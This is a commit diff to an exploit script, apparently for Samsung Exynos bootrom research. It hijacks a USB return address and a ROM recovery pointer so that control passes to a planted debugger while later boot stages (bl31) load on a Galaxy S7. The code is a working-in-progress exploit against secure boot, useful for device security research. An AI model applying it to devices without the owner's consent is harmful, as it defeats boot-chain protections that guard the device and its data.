Debugger alive after bl31

source/exploit/exploit.py

@@ -83,7 +83,7 @@ class ExynosDevice():
         except Exception as e:
             if e.value == usb1.libusb1.LIBUSB_ERROR_TIMEOUT or e.value == usb1.libusb1.LIBUSB_ERROR_IO:
                 print("Device disconnected / not connected. Reconnect USB?")
-                sys.exit(0)
+                sys.exit(1)
             else:
                 raise e
             
@@ -380,7 +380,7 @@ class ExynosDevice():
                 sys.exit(0)
 
         self.cd.memwrite_region(0x020c0000, debugger_reloc)
-        self.usb_write(b"FLSH") # Flush cache
+        # self.usb_write(b"FLSH") # Flush cache
         self.cd.restore_stack_and_jump(0x020c0000)
         assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
         self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
@@ -563,12 +563,13 @@ class ExynosDevice():
         logger.debug('State after setting up initial debugger')
         self.cd.arch_dbg.state.print_ctx()
 
+        # self.relocate_debugger()
         DEBUGGER_ADDR = 0x2069000 #0x020c0000
 
         ### Overwrite boot_usb_ra to our debugger
         self.cd.test_connection()
         hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
-        self.cd.memwrite_region(0x02020f60, p64(0x2069000))
+        self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))
 
         ### Set link register and boot into the USB function
         BOOT_USB_FUNCTION = 0x000064e0
@@ -600,21 +601,34 @@ class ExynosDevice():
         
         assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
         auth_bl1(DEBUGGER_ADDR)
-        time.sleep(1)
-
-        self.cd.memwrite_region(0x02020f60, hijacked_usb_ra)
 
         self.usb_write(b"FLSH") # Flush cache
+        
+        # hijack rom recovery
+        # self.relocate_debugger()
+        # DEBUGGER_ADDR = 0x020c0000
+        self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # Rom recovery
+        self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))
+
         jump_bl1(DEBUGGER_ADDR)
         time.sleep(2)
         self.connect_device()
-        # self.connect_device()
 
+        # After booting bl1, back in debugger. 
+        self.usb_read(0x200) # GiAs
+        self.cd.memwrite_region(0x02020f60, hijacked_usb_ra) 
+
+        # Load bl31
+        self.cd.restore_stack_and_jump(0x00006590)
+        # self.usb_read(0x200) # GiAs
 
         self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
-        time.sleep(2)
+        time.sleep(1)
         self.connect_device()
 
+        ### WORKS UNTIL HERE. Unsure where we are in BL31 currently
+
+        # Load BL3
         self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
         time.sleep(2)
         self.connect_device()